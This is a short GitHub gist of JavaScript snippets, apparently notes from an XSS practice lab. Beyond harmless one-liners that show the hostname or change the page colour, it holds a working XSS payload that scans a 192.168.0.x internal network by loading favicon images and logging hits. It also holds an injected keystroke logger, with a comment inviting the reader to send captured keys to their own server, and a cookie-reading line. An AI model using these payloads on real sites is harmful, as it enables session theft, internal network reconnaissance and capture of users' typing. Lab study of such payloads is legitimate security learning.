Last active
July 21, 2020 01:47
-
-
Save dustinbutterworth/639c04fd9f7bc44beb27e84b0ff2254f to your computer and use it in GitHub Desktop.
Javascript Tomfoolery
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Show hostname | |
| window.location.hostname | |
| // show cookie | |
| document.cookie | |
| // background color | |
| document.body.style.backgroundColor = "red" | |
| // IP and Port Scan with javascript - XSS Playground | |
| <script> | |
| for (let i = 0; i < 256; i++) { // This is looping from 0 to 255 | |
| let ip = '192.168.0.' + i // Creates variable for forming IP | |
| // Creating an image element, if the resource can load, it logs to the /logs page. | |
| let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">' | |
| document.body.innerHTML += code // This is adding the image element to the webpage | |
| } | |
| </script> | |
| // logging keystrokes with javascript - XSS Playground | |
| <script type="text/javascript"> | |
| let l = ""; // Variable to store key-strokes in | |
| document.onkeypress = function (e) { // Event to listen for key presses | |
| l += e.key; // If user types, log it to the l variable | |
| console.log(l); // update this line to post to your own server | |
| } | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment